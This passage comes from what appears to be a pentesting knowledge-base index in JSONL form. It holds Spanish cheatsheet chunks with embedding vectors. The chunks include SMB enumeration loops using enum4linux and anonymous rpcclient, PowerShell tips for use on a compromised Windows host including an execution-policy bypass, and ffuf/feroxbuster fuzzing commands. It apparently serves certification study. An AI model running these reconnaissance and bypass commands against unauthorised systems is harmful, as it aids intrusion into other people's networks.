0.01101, -0.00622, 0.01854, -0.02608, -0.03345, -0.01123, -0.0255, -0.04236, -0.02738, -0.0124, 0.04616, -0.03718, 0.04775, 0.01547, -0.0238, 0.09214, -0.0711, 0.0201, 0.00938, -0.05309, -0.02479, 0.01801, -0.06661, 0.03733, 0.03391, 0.01298, -0.02835, 0.02879, 0.01812, 0.05351, 0.00766, -0.03363, -0.03269, 0.05076, -0.00858, -0.00557, 0.02822, 0.03082, 0.04592, -0.03733, 0.01024, -0.0038, 0.0396, -0.00138, -0.00867, 0.00979, 0.0051, -0.0459, 0.00413, -0.00457, -0.041, 0.04137, -0.02792, 0.00198, -0.01462, -0.01584, -0.06824, -0.03708, -0.00734, 0.02458, -0.02398, -0.03815, -0.0079, -0.06381, 0.03803, 0.05057, -0.0128, -0.00051, 0.02406, 0.01161, 0.01066, 0.00942, 0.00798, 0.02105, -0.02546, 0.05438, -0.00631, -0.01493, -0.00128, -0.03453, 0.00965, -0.00171, -0.06091, -0.04247, 0.02956, 0.06, -0.05237, 0.04385, 0.0362, -0.03029, -0.03666, 0.01138, 0.0266, -0.04556, 0.04523, -0.01777, -0.02747, -0.06946, -0.04749, -0.03059, -0.05391, -0.02196, -0.00569]} +{"tipo": "metodologia", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "texto": "## Bucle sobre IPs (anatomía)\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do\n echo \"=== $ip ===\"\n enum4linux -a $ip < /dev/null 2>/dev/null | grep -i alfred\ndone\n```\n- `< /dev/null` → evita que se cuelgue en prompts `Password:`.\n- Si falta `done`, bash se queda en `for>` (Ctrl+C).", "v": [0.08802, -0.09038, -0.13911, -0.0016, 0.08316, -0.25097, -0.03554, -0.06078, -0.02647, 0.06954, -0.09475, -0.08, -0.05673, -0.12201, -0.05361, -0.06939, -0.08974, -0.07298, 0.03051, -0.00458, 0.00639, 0.11638, -0.04951, -0.05332, -0.09149, 0.11372, -0.15023, 0.14137, -0.15882, -0.09773, -0.05545, -0.20294, -0.02641, -0.07661, -0.05086, -0.04851, 0.10338, 0.05498, -0.02862, 0.20148, -0.06208, 0.00455, -0.13908, 0.13361, 0.03883, -0.12714, 0.03867, 0.03791, -0.00068, -0.01725, -0.11261, -0.05446, -0.04174, -0.08936, -0.09797, 0.03755, 0.15389, -0.08238, -0.04301, -0.04762, -0.03338, 0.09608, -0.05967, 0.00915, 0.03092, -0.04555, -0.00177, -0.07575, -0.05754, 0.08647, -0.06038, 0.00651, -0.16181, -0.01808, 0.11746, -0.0159, 0.01591, -0.1219, 0.11097, 0.08587, -0.06929, -0.04221, -0.04175, -0.05686, -0.06516, -0.09138, 0.06647, -0.07033, -0.05557, -0.02162, 0.07746, 0.04091, 0.0438, 0.00251, 0.03185, -0.09267, 0.01687, 0.06489, 0.0051, -0.02487, 0.01237, 0.07936, -0.07892, 0.10228, 0.11587, 0.04734, 0.05203, 0.13176, -0.01355, 0.02527, 0.11619, -0.04343, 0.07446, -0.06675, -0.06393, -0.02497, -0.01095, -0.01895, 0.02166, 0.00779, -0.04279, -0.04022, -0.10753, 0.0531, -0.09692, 0.01034, -0.02581, 0.05196, 0.05059, 0.04709, 0.01595, -0.01518, 0.02288, -0.03761, -0.04359, 0.03854, 0.01468, 0.00594, -0.04068, -0.01024, 0.04575, 0.01226, -0.00163, 0.03117, 0.11165, -0.0367, 0.04453, -0.07539, -0.02754, -0.01494, 0.07314, 0.04702, 0.00878, 0.03149, 0.00065, -0.01415, -0.01858, -0.00907, -0.00849, -0.03839, -0.01758, 0.03916, -0.00805, 0.05185, -0.01965, -0.01235, -0.03408, -0.03001, 0.10139, -0.05442, -0.0062, 0.06782, -0.05582, -0.06107, 0.01341, -0.06779, 0.01165, 0.01253, -0.00957, -0.01638, 0.07198, -0.0123, 0.00279, 0.01255, 0.01903, -0.01541, 0.04476, -0.01198, 0.04427, 0.04072, 0.00498, 0.03666, -0.0472, 0.00263, -0.00492, 0.00912, -0.03205, -0.02944, 0.00434, 0.03145, -0.04728, 0.03103, 0.01308, -0.04297, 0.0188, -0.02389, -0.00509, -0.00878, -0.03353, -0.00671, 0.016, -0.00326, 0.01295, -0.01873, -0.03223, -0.00879, 0.00512, 0.08326, -0.00126, -0.03741, -0.00372, 0.0449, 0.0194, -0.01414, 0.02315, 0.02545, 0.02625, 0.01201, 0.03931, -0.00113, -0.04301, 0.06104, -0.01237, -0.00934, 0.0038, -0.04738, -0.03995, -0.04516, -0.03498, -0.04072, 0.0417, 0.06079, -0.01126, -0.05705, -0.05851, -0.04296, -0.08003, 0.01823, -0.00016, -0.01843, -0.05551, -0.04164, 0.0006, -0.04667, 0.01759, -0.01372]} +{"tipo": "metodologia", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "texto": "## Enumerar SMB de todos y luego grep\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do enum4linux -a $ip < /dev/null > enum_$ip.txt 2>&1; done\ngrep -l \"alfred\" enum_*.txt # en QUÉ host está el usuario\ngrep -iE 'remark|flag|OS\\{' enum_HOST.txt # flag en comentarios de shares\n```", "v": [0.14492, -0.17268, -0.07228, -0.02976, 0.10796, -0.20148, -0.14019, -0.03366, 0.10523, 0.11988, -0.11475, -0.08492, 0.0906, -0.07537, 0.03059, 0.01191, -0.08522, -0.09044, 0.04804, 0.00412, 0.02546, 0.17302, -0.04343, -0.06673, -0.06293, 0.00844, -0.10282, 0.08557, -0.14436, -0.07388, 0.04666, -0.20341, -0.07325, -0.09066, -0.10261, -0.06173, 0.1046, 0.07926, 0.01831, 0.19939, 0.00292, 0.01123, -0.16206, 0.13058, -0.00211, -0.10792, -0.02014, 0.04077, 0.02174, -0.05289, -0.09486, -0.06362, -0.05818, -0.1037, -0.15928, 0.08009, 0.13432, -0.08716, -0.08612, 0.03207, 0.00339, 0.03393, -0.02941, -0.14056, 0.00287, -0.03665, -0.02458, 0.02557, -0.03853, 0.04813, -0.00146, 0.09956, -0.05915, -0.04978, 0.08724, 0.04656, 0.03011, -0.10703, 0.0833, 0.08268, -0.03029, -0.07235, -0.08382, -0.02978, -0.03787, -0.10955, 0.02924, -0.02191, -0.03799, -0.01146, 0.05497, 0.00725, 0.01863, 0.09322, -0.0061, -0.1243, 0.00807, 0.04099, 0.0327, 0.00056, 0.03516, 0.06774, -0.09244, 0.01797, 0.06065, 0.02381, 0.0625, 0.11945, 0.0138, 0.04012, 0.10847, -0.01543, 0.01768, 0.00179, -0.06894, -0.11416, -0.0174, -0.02667, -0.0075, -0.03664, -0.06842, -0.08694, -0.06877, 0.0379, -0.01779, -0.01877, 0.01662, 0.02885, 0.06724, 0.00418, -0.02705, 0.02108, 0.02608, -0.06872, -0.08128, -0.00442, -0.01807, 0.04664, 0.00116, 0.01385, 0.02633, 0.02315, 0.00683, 0.05382, 0.07008, -0.03051, 0.01478, -0.07395, -0.02078, 0.0284, 0.09595, -0.03347, -0.00689, 0.00818, 0.00625, 0.03205, -0.01584, -0.01818, -0.04463, -0.03191, -0.0178, -0.02613, -0.02135, 0.04194, -0.03786, 0.03218, -0.01666, 0.01282, 0.09588, -0.03853, -0.02008, 0.05764, -0.02277, -0.08061, 0.04714, -0.08941, 0.0013, 0.02257, -0.00958, -0.0194, 0.05228, -0.02041, 0.0384, -0.00454, 0.00257, -0.02658, 0.02603, 0.02982, 0.02434, 0.00837, -0.00642, 0.02013, -0.07155, 0.03718, -0.01136, 0.01228, -0.05565, 0.02207, -0.00032, 0.00677, -0.09996, 0.01626, -0.03882, -0.02597, 0.00343, -0.06103, -0.00433, -0.01384, -0.01031, -0.02761, 0.00134, 0.03292, 0.0259, -0.00878, -0.05678, -0.00275, 0.01943, 0.09433, 0.01303, -0.00817, -0.01822, 0.04807, 0.02329, -0.05003, -0.00862, 0.02738, 0.02132, -0.03042, 0.03947, -0.00459, -0.02084, 0.03499, -0.01567, 0.00857, 0.0156, -0.03784, -0.06446, -0.00161, -0.01093, -0.05447, 0.02867, 0.04215, -5e-05, -0.05801, -0.05077, -0.02695, -0.10373, 0.02912, 0.01481, -0.01588, -0.07294, -0.04882, 0.00286, -0.01737, -0.01318, 0.01474]} +{"tipo": "metodologia", "herramienta": "Bucles bash sobre IPs", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Bucles bash sobre IPs.md", "texto": "## Flags en comentarios de shares de toda la red\n```bash\nfor ip in $(grep \"445/open\" smb.txt | cut -d' ' -f2); do echo \"=== $ip ===\"; rpcclient -U \"\" -N $ip -c \"netshareenumall\" 2>/dev/null | grep -i \"flag\\|OS{\"; done\n```\n\nRelacionado: SMB · Enumeración · OSCP MOC", "v": [0.08009, -0.1599, -0.04401, -0.08166, 0.08194, -0.27293, -0.06308, -0.03169, 0.01215, 0.07634, -0.09392, -0.12356, 0.08775, -0.16809, -0.06595, 0.02821, -0.13715, -0.01114, 0.00774, -0.00199, -0.00544, 0.09416, -0.09125, -0.02748, -0.05355, 0.13476, -0.17567, 0.05519, -0.09659, -0.03927, -0.00416, -0.16183, -0.07051, -0.05151, -0.08031, -0.05301, 0.04527, 0.0141, -0.007, 0.16031, -0.06376, -0.00284, -0.19692, 0.11918, 0.08648, -0.10021, 0.03819, 0.05322, -0.01452, -0.07628, -0.08981, -0.07881, -0.13795, -0.03844, -0.14763, 0.073, 0.12051, -0.03736, -0.06377, 0.04588, -0.01589, 0.10892, -0.02495, -0.07312, 0.03829, -0.0291, -0.03578, -0.01041, -0.07982, 0.02053, -0.0469, 0.09177, -0.09891, -0.01599, 0.10739, 0.04319, 0.06338, -0.16332, 0.16335, 0.07976, -0.02596, -0.06822, -0.05115, -0.00208, -0.03689, -0.11534, 0.09286, -0.01719, -0.01011, -0.03146, 0.02551, 0.03498, 0.01781, 0.04349, 0.01238, -0.14549, -0.02332, 0.02576, 0.03656, -0.02562, 0.03019, 0.09949, -0.09089, 0.00231, 0.074, 0.04453, 0.04641, 0.08629, 0.01016, 0.07267, 0.07267, -0.01543, 0.04737, -0.03338, -0.06152, -0.04532, -0.0233, -0.04002, 0.02928, -0.00327, -0.04742, -0.07472, -0.05745, 0.04792, -0.04158, -0.0054, -0.01599, 0.05465, 0.01892, 0.06285, -0.02552, -0.01604, 0.0068, -0.04791, -0.06856, 0.00726, -0.02893, -0.03717, 0.01772, -0.01058, 0.00666, 0.00839, -0.01801, 0.02388, 0.11207, -0.00276, 0.00729, -0.0626, -0.04209, 0.00093, 0.09152, 0.01428, -0.06576, -0.00093, 0.00238, 0.026, -0.0104, -0.02465, -0.02113, 0.01608, -0.00975, 0.00973, -0.00857, 0.06895, -0.00849, 0.00289, -0.04367, -0.01724, 0.10541, -0.09733, -0.00885, 0.05843, -0.04183, -0.01934, -0.0142, -0.09536, 0.02552, 0.03142, 0.01025, -0.04968, 0.07177, -0.02916, 0.05322, 0.02517, 0.01725, -0.0195, 0.01595, 0.01232, 0.04174, -0.02749, 0.03598, 0.00167, -0.04612, 0.02804, -0.00758, 0.00506, -0.0347, -0.02492, -0.01111, 0.03759, -0.1034, 0.02234, -0.05218, -0.02627, -0.00694, -0.04538, 0.01069, 0.02869, -0.02213, -0.01999, 0.01692, 0.0078, 0.04622, -0.03948, -0.02615, 0.00977, 0.01787, 0.0703, 0.03507, -0.02735, 0.00322, 0.0538, -0.00137, -0.02045, 0.01329, 0.03429, 0.00363, -0.01314, 0.03494, -0.00636, -0.04771, 0.04066, 0.00616, -0.04247, 0.01424, -0.04576, -0.07007, -0.02948, -0.02195, -0.04687, 0.0367, 0.03646, 0.02481, -0.0376, -0.02815, -0.05936, -0.06685, -0.02082, 0.02762, -0.00263, -0.06909, -0.04738, 0.00486, -0.03684, -0.01899, 0.01797]} +{"tipo": "metodologia", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "texto": "# Operadores PowerShell\n\n> Para cuando trabajas **dentro** de la víctima Windows. Base de Port scanner PowerShell.\n\n```\n| tubería (igual que bash) Get-Process | Where-Object {...}\n% alias de ForEach-Object 1..200 | % { ... }\n$_ el elemento actual del bucle 1..10 | % { \"puerto $_\" }\n-and -or -not (o !) lógicos\n-eq -ne igual / distinto ($x -eq 5)\n-lt -gt -le -ge menor/mayor (-igual) ($port -lt 1000)\n> redirige a fichero\n2>$null silenciar errores (= 2>/dev/null)\nOut-Null tirar salida no deseada $c.Connect(..) | Out-Null\n` backtick = continuar en línea siguiente (como \\ en bash)\n; separar comandos en una línea\n```", "v": [0.0167, -0.03303, -0.10929, -0.05956, -0.06408, -0.14776, -0.06162, -0.03854, -0.00515, 0.0421, -0.17474, -0.11027, 0.01166, 0.00601, -0.05895, -0.09313, -0.08109, -0.07349, -0.03757, 0.03257, -0.04275, 0.03903, -0.03795, -0.1127, 0.0787, 0.17954, -0.04013, 0.0975, -0.17059, 0.00263, -0.04014, -0.03282, 0.05532, -0.16838, -0.00302, 0.02257, -0.05183, 0.01271, 0.05746, 0.14313, 0.03311, 0.12479, -0.06917, 0.10783, 0.10432, -0.15427, 0.05522, 0.06722, 0.07937, -0.03766, 0.02073, 0.0115, -0.12245, 0.06885, -0.02339, -0.04504, 0.18672, 0.06859, 0.00804, -0.07436, 0.04474, 0.02553, -0.02174, -0.09623, 0.00744, 0.04796, 0.00755, -0.04158, -0.05097, 0.02216, -0.0915, -0.01371, -0.07122, -0.08214, 0.10605, -0.03898, 0.0957, -0.10772, 0.07732, 0.08486, -0.05185, -0.00882, -0.02887, -0.01833, -0.03345, -0.06954, 0.02009, -0.06331, -0.05366, -0.02407, 0.05972, -0.01548, -0.04264, 0.03181, -0.03399, -0.14074, 0.02059, 0.0366, 0.02276, 0.00016, 0.10217, -0.03347, -0.12092, 0.07974, 0.08663, 0.01856, 0.01804, -0.00242, -0.02772, -0.0063, 0.05655, -0.06613, 0.09743, -0.06244, -0.08121, 0.01112, -0.09384, -0.03911, -0.01171, 0.01863, 0.02218, -0.03661, -0.02665, 0.00746, 0.01275, -0.11189, -0.04794, 0.07467, 0.09469, -0.00283, 0.01956, 0.03438, 0.01121, -0.0552, -0.06527, 0.09125, 0.03108, -0.07513, 0.05763, -0.11658, 0.09914, 0.03565, -0.04594, 0.03106, 0.12004, 0.03246, 0.08879, -0.03556, -0.11072, -0.01037, 0.07451, 0.04811, -0.00156, 0.05238, -0.02542, -0.04693, 0.02133, -0.05491, -0.04731, -0.00884, 0.04019, 0.10256, 0.05551, 0.07037, -0.03462, -0.08518, -0.07165, -0.04722, 0.02777, -0.06386, -0.02321, 0.03446, -0.08161, -0.00482, -0.00816, -0.04907, 0.05996, -0.07074, -0.00315, -0.04589, 0.06373, 0.03308, -0.01971, -0.00322, 0.00781, 0.01709, 0.01443, -0.10946, 0.0244, 0.04854, -0.06951, 0.02486, -0.02853, -0.0396, -0.01693, 0.00965, 0.01303, -0.01752, 0.02597, 0.03475, -0.04902, 0.07296, 0.05133, -0.06354, 0.03464, -0.01821, -0.06316, -0.00827, -0.06565, 0.00803, 0.03733, -0.01445, 0.01822, -0.03065, -0.06315, -0.0216, -0.00214, -0.03424, 0.05718, 0.04524, -0.05385, 0.05426, -0.01364, 0.01723, 0.0233, 0.01707, 0.00521, -0.00097, 0.03956, 0.0558, -0.02491, 0.03214, -0.03667, -0.06923, -0.00832, 0.04595, -0.04396, -0.04675, -0.09983, -0.0514, 0.0138, 0.07249, -0.00963, -0.07097, -0.04588, -0.08651, -0.05241, 0.03266, 0.01189, -0.03661, -0.04157, -0.00572, 0.00174, -0.11702, -0.01901, -0.04837]} +{"tipo": "metodologia", "herramienta": "Operadores PowerShell", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Operadores PowerShell.md", "texto": "## Trampas\n- `\"$_ABIERTO\"` se lee como variable `_ABIERTO` (vacía). **Pon espacio**: `\"$_ ABIERTO\"`.\n- Silenciar TODO al inicio de un script:\n ```powershell\n $ErrorActionPreference = \"SilentlyContinue\"\n $WarningPreference = \"SilentlyContinue\"\n ```\n Por comando: `-ea 0` (ErrorAction) · `-wa 0` (WarningAction).\n- Correr un `.ps1` bloqueado: `powershell -ep bypass -File .\\script.ps1`.\n\nRelacionado: Operadores Bash · Port scanner PowerShell · OSCP MOC", "v": [-0.16624, -0.06302, -0.05235, -0.1355, 0.0443, -0.22388, 0.14892, -0.17242, -0.05828, 0.08759, -0.07431, -0.0266, 0.0799, -0.07193, 0.04107, -0.00921, -0.09954, -0.02961, 0.02469, 0.02987, 0.09262, 0.07201, -0.03172, -0.06361, 0.1709, 0.16226, -0.13562, 0.0458, -0.13489, -0.1067, -0.03776, -0.0134, 0.16342, -0.02217, -0.03412, 0.01205, -0.05362, 0.02474, 0.13158, 0.2669, -0.01082, 0.05448, -0.04401, 0.15922, 0.04208, -0.08765, 0.12586, 0.06955, 0.06049, 0.03676, -0.05625, 0.00682, -0.10361, 0.06032, 0.13066, 0.00585, 0.16197, 0.01988, -0.04098, -0.02296, -0.00962, 0.03063, 0.00616, -0.05629, -0.01481, 0.04836, 0.00951, -0.13383, -0.00744, 0.0925, -0.15648, 0.01623, -0.02908, -0.03125, 0.07414, -0.07041, 0.06077, -0.04008, 0.13519, 0.02299, -0.05761, 0.00467, -0.00818, -0.02058, -0.07141, -0.04748, 0.05654, -0.01785, -0.03458, -0.02747, 0.09884, -0.01054, 0.00765, 0.07422, 0.0029, -0.12038, -0.00615, 0.02971, 0.01351, -0.01208, 0.0513, 0.0418, -0.06998, 0.07378, 0.11028, 0.06574, -0.04259, 0.02611, 0.01991, -0.00081, 0.01751, -0.05091, 0.05071, -0.01887, -0.05068, 0.00805, -0.02727, -0.07402, 0.03392, -0.06063, -0.04274, 0.00315, 0.00365, 0.03998, -0.06765, -0.01982, -0.00346, 0.01989, 0.05218, 0.04458, -0.01947, 0.00196, -0.00865, -0.0518, -0.02108, 0.05934, 0.03833, 0.0098, 0.00497, -0.01213, 0.0741, 0.04604, 0.04119, 0.0801, 0.05022, 0.00086, 0.04812, -0.05055, -0.00059, -0.00642, 0.03212, 0.06225, -0.00903, 0.07441, 0.07919, -0.06492, -0.01494, -0.00884, -0.04932, -0.02257, -0.00755, 0.05923, 0.02936, 0.08085, -0.02741, -0.0739, -0.01437, -0.03571, -0.02636, -0.07965, -0.00106, 0.0113, -0.03674, 0.00733, -0.03556, -0.08886, 0.0932, -0.01723, -0.04722, -0.03646, 0.01998, -0.02028, -0.00936, 0.05295, -0.05417, -0.02072, 0.02576, -0.10981, 0.00996, -0.01455, -0.01528, 0.05415, -0.00971, -0.10818, -0.00774, 0.00247, 0.00647, -0.01856, -0.00535, -0.00797, -0.05403, 0.02947, 0.00933, 0.00331, -0.00369, -0.02746, -0.05401, 0.05886, -0.06651, -0.02542, 0.02606, -0.02787, 0.01959, -0.00178, -0.01986, -0.02001, 0.05028, 0.04059, -0.01893, -0.02489, -0.04102, 0.04363, -0.00424, 0.02941, 0.02271, 0.01954, 0.03237, -0.00637, 0.03933, 0.01591, 0.0041, 0.0231, -0.02004, -0.02038, 0.00341, -0.02989, -0.05122, 0.01127, -0.06279, 0.02134, 0.00601, 0.02428, -0.00126, -0.09478, -0.08483, -0.07161, 0.0006, 0.0169, 0.03796, 0.03719, -0.02396, -0.02588, -0.01901, -0.07563, 0.02287, -0.0007]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# Comandos de herramientas de pentesting\n\nReferencia densa de las invocaciones mas usadas de las herramientas que NO traen\nman page. Marcadores: `IP` objetivo, `TU_IP` atacante, `DOM` dominio, `USER`,\n`PASS`, `HASH` (NTLM), `URL`, `WL` wordlist.", "v": [-0.08681, -0.08768, -0.10539, -0.09931, 0.02975, -0.13845, -0.03496, -0.09456, -0.09237, 0.19233, -0.00564, -0.11921, -0.03508, -0.11976, -0.06227, 0.08304, 0.00564, -0.05645, 0.08896, -0.06712, -0.04764, 0.08453, -0.15756, 0.01056, -0.04436, -0.01191, -0.07432, -0.02761, -0.08785, 0.03408, -0.04762, -0.05217, -0.10013, -0.04623, -0.06073, -0.20532, -0.01646, 0.07844, 0.09136, 0.27166, 0.00418, 0.06598, -0.20661, 0.05775, 0.0991, 0.00551, -0.0013, -0.05701, 0.02804, -0.0576, -0.0587, -0.03622, -0.06948, -0.05518, -0.02975, -0.04934, 0.21352, 0.05604, -0.04593, -0.08814, -0.02419, 0.00701, -0.03403, -0.03062, 0.06334, -0.09308, -0.06688, -0.10283, -0.04355, 0.05478, -0.05853, 0.00583, 0.04454, -0.05932, 0.11592, -0.00692, 0.07892, 0.00437, 0.10496, 0.02265, -0.04038, -0.03637, -0.12309, -0.03964, -0.07847, -0.01947, 0.15824, -0.13287, -0.00472, -0.05506, 0.09503, 0.06009, 0.00759, -0.02706, 0.01823, -0.04224, 0.03152, 0.08071, 0.05107, -0.0488, 0.02764, 0.08678, -0.05425, 0.05416, 0.11764, 0.07806, 0.05312, 0.04719, 0.04427, -0.04144, 0.04161, -0.02561, -0.05995, -0.07586, 0.0505, 0.0047, -0.09861, -0.01687, 0.00156, -0.09667, 0.08232, -0.03475, 0.00253, 0.04199, -0.00662, -0.04049, -0.03835, -0.02164, -0.04165, -0.1057, 0.0146, -0.06687, -0.044, -0.02672, 0.00251, -0.04678, 0.02133, -0.08375, -0.01895, 0.05018, 0.05358, -0.01207, -0.08613, 0.0312, 0.07606, -0.03833, 0.03363, -0.0525, -0.08068, -0.00706, 0.03788, 0.06585, 0.02865, 0.01332, 0.02374, 0.01828, -0.01774, 0.02866, -0.03089, 0.01332, -0.0758, 0.06144, 0.049, 0.01463, 0.04208, 0.02251, 0.00207, -0.03963, 0.05353, -0.05164, 0.02882, -0.01393, -0.04991, -0.00597, -0.06087, -0.07064, 0.02652, -0.00725, -0.01702, -0.03561, 0.04035, -0.08477, -0.03292, 0.01645, -0.01993, -0.01947, 0.03854, -0.02339, 0.03082, 0.04966, 0.04256, -0.00579, -0.03142, -0.05227, 0.07041, -0.02084, -0.00163, -0.06206, 0.02886, -0.0096, -0.06145, -0.04658, -0.00394, -0.02999, 0.01926, 0.01008, -0.03775, -0.00904, -0.07152, 0.00088, 0.00503, -0.05413, 0.0297, -0.07894, -0.05632, -0.02049, 0.00085, -0.0007, 0.02675, -0.02539, -0.00278, 0.10454, 0.02647, 0.04201, 0.01025, 0.00477, -0.00027, -0.02326, 0.05337, -0.00126, -0.05838, -0.00219, -0.04147, -0.08559, -0.02289, -0.01409, 0.00677, 0.00903, -0.07346, 0.04193, -0.038, 0.00805, 0.04002, -0.02108, -0.04582, -0.06008, -0.04547, -0.00375, 0.03374, 0.01099, 0.02438, -0.02236, 0.00597, -0.01562, 0.02562, 0.00377]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# ffuf\nffuf -u http://IP/FUZZ -w WL -mc 200,301,302,401,403 -e .php,.txt,.html\nffuf -u http://IP/ -w WL -H \"Host: FUZZ.dominio.com\" -fs 4242 # vhost\nffuf -u \"http://IP/page?FUZZ=1\" -w WL -fw 42 # parametros\nffuf -u http://IP/api/FUZZ -w WL -mc all -fc 404 -recursion", "v": [0.04041, -0.21708, -0.03547, -0.00828, 0.05518, -0.13758, -0.03055, -0.12526, 0.0038, 0.0631, -0.01413, -0.05983, -0.08052, 0.02637, -0.05049, 0.01404, -0.00616, -0.0533, -0.09844, -0.14124, 0.03855, 0.15297, -0.15817, -0.15581, -0.07827, 0.09653, -0.10743, -0.02374, -0.14024, -0.26098, 0.23587, -0.09852, -0.08211, 0.07747, -0.05328, -0.02616, 0.07802, 0.13796, 0.0932, 0.19158, -0.00596, 0.09338, -0.13072, 0.07263, 0.03581, -0.01902, -0.03576, -0.14996, 0.08179, -0.02868, 0.04982, -0.15393, 0.06642, 0.05815, -0.13214, -0.01128, 0.04196, 0.02289, -0.03029, 0.0183, 0.0241, 0.00281, -0.1223, -0.08515, -0.01881, 0.01327, -0.03955, 0.0343, -0.01942, -0.02567, -0.04412, -0.02427, -0.02262, -0.12978, 0.06968, 0.03132, 0.08011, -0.07101, 0.10619, -0.02787, -0.08971, 0.05729, -0.13136, -0.05707, -0.01259, 0.00619, 0.03327, -0.14995, -0.00236, -0.04303, -0.00434, 0.06975, -0.12088, 0.01029, 0.02805, -0.06619, 0.04875, 0.04231, 0.05306, -0.00458, -0.01582, 0.02948, -0.03844, 0.02093, 0.12196, -0.00614, 0.06455, 0.03239, 0.05482, 0.07756, -0.03034, 0.02166, -0.01688, -0.08256, -0.03017, -0.03703, -0.04202, 0.02922, 0.06177, -0.0541, -0.01278, -0.03652, -0.00078, 0.00699, -0.07326, 0.07236, 0.03109, 0.00286, -0.02441, -0.04312, 0.04834, -0.02945, -0.01569, 0.00141, -0.0215, 0.05518, 0.03733, 0.03736, 0.0016, 0.07035, 0.03458, -0.02924, -0.02574, 0.04445, 0.07475, -0.06226, 0.03162, -0.05558, -0.00239, 0.02443, 0.03555, 0.03443, 0.03139, -0.04205, -0.00508, 0.04503, 0.04715, 0.04211, -0.00148, -0.00437, 0.00236, 0.0553, 0.07538, -0.00417, 0.024, 0.02668, -0.00051, 0.00253, 0.00796, -0.11089, -0.06742, 0.04834, -0.01488, -0.0388, 0.00359, -0.04429, 0.00755, 0.00277, 0.01286, -0.00744, 0.00391, -0.04861, 0.01558, 0.02424, 0.04102, -0.00386, 0.00942, 0.03108, 0.01817, -0.00398, 0.06493, -0.00797, -0.04237, -0.00447, -0.00555, 0.04626, -0.02818, -0.07557, -0.04217, -0.04451, -0.05908, -0.01392, -0.02652, 0.00869, 0.01175, -0.05795, 0.03069, 0.00692, -0.02381, -0.04666, 0.01984, -0.05846, 0.05076, -0.0525, -0.04114, 0.02033, -0.00292, 0.02634, 0.0372, 0.00941, 0.02895, 0.03503, 0.00079, 0.01433, 0.00824, -0.00396, 0.04705, 0.01203, -0.01335, -0.03322, -0.01005, 0.04044, -0.00035, -0.0521, 0.02758, -0.02499, -0.01152, 0.00967, -0.01801, -0.02977, -0.02405, 0.00026, -0.04606, -0.01008, -0.0204, -0.04398, -0.08477, 0.04271, -0.0218, 0.00627, -0.01478, -0.08897, -0.03535, -0.0347, -0.01391, 0.00746]} +{"tipo": "metodologia", "herramienta": "Comandos de herramientas", "perfil": "PENTESTERS", "tema": "cheatsheets", "fichero": "conocimiento/06 - Cheatsheets/Comandos de herramientas.md", "texto": "# feroxbuster\nferoxbuster -u http://IP -w WL -x php,txt,html -d 2 -t 50\nferoxbuster -u http://IP --filter-status 404 --extract-links", "v": [0.06593, -0.22356, -0.13287, -0.04319, 0.07423, -0.19433, -0.06649, -0.03072, 0.05699, 0.07691, -0.01115, -0.07475, -0.00448, -0.01591, -0.06222, 0.00396, -0.07791, -0.02981, 0.01603, -0.1691, 0.06718, 0.2067, -0.18421, -0.08841, 0.00432, 0.09051, -0.20585, 0.02963, -0.13251, -0.10191, -0.01094, -0.13019, -0.07305, 0.00223, -0.08646, 0.00124, 0.06486, 0.09613, 0.00479, 0.18644, 0.01847, 0.11333, -0.02991, 0.04206, 0.01727, -0.00558, 0.00675, -0.14398, 0.04298, -0.03118, -0.01066, -0.13117, 0.0195, 0.00541, -0.15791, 0.01051, 0.01508, -0.06039, 0.04626, 0.07147, 0.04928, 0.06017, -0.18934, -0.14651, 0.01151, 0.0271, -0.06286, 0.03989, 0.00858, -0.03571, -0.0185, -0.02358, -0.04542, -0.00118, 0.05218, -0.00706, 0.07896, -0.0736, 0.06885, 0.09084, -0.04296, 0.04583, -0.02404, -0.03657, 0.01521, -0.04011, -0.00465, -0.20177, -0.01602, -0.03359, 0.0386, 0.00599, 0.02109, 0.00495, 0.05242, -0.10161, 0.01081, 0.05369, -0.04149, -0.06326, 0.01808, 0.10211, -0.06459, -0.04314, 0.09564, -0.08389, 0.01892, 0.10265, -0.02425, 0.02987, 0.04217, 0.01067, 0.0734, -0.03267, -0.00233, -0.02943, -0.09574, 0.04503, -0.06111, 0.05148, -0.08485, -0.01533, -0.07696, 0.02557, -0.02921, 0.00913, 0.04031, 0.07551, 0.012, -0.14525, 0.05131, -0.03694, -0.05717, 0.00332, -0.0385, 0.01078, -0.02953, 0.01651, -0.01398, 0.02426, 0.02296, -0.00064, -0.04207, 0.10008, -0.0247, 0.00086, 0.04169, 0.00706, 0.00827, -0.02968, 0.01458, -0.03677, 0.06893, 0.039, -0.0001, -0.00535, 0.01143, 0.00861, 0.02763, -0.06454, -0.0205, 0.01327, 0.03679, -0.01355, 0.02647, 0.04698, -0.05456, 0.0377, -0.02797, -0.05666, -0.02829, -0.02072, 0.0559, -0.08405, -0.01649, -0.10783, 0.06119, -0.07039, 0.02188, -0.02691, 0.04958, -0.07873, 0.01783, -0.01752, 0.03522, -0.00424, 0.00776, 0.01175, -0.03827, -0.01972, 0.06448, -0.05486, 0.00081, 0.00134, 0.04201, 0.00628, 0.01751, -0.00298, -0.01776, -0.05316, -0.12397, -0.03759, 0.03799, -0.04313, 0.00823, -0.04437, 0.0306, -0.04165, 0.00185, 0.03152, 0.05263, 0.01069, 0.0175, -0.05536, -0.05174, 0.02189, 0.05317, 0.01047, 0.04296, 0.01511, -0.00123, -0.02168, -0.01192, 0.01513, -0.01678, 0.03745, 0.00675, 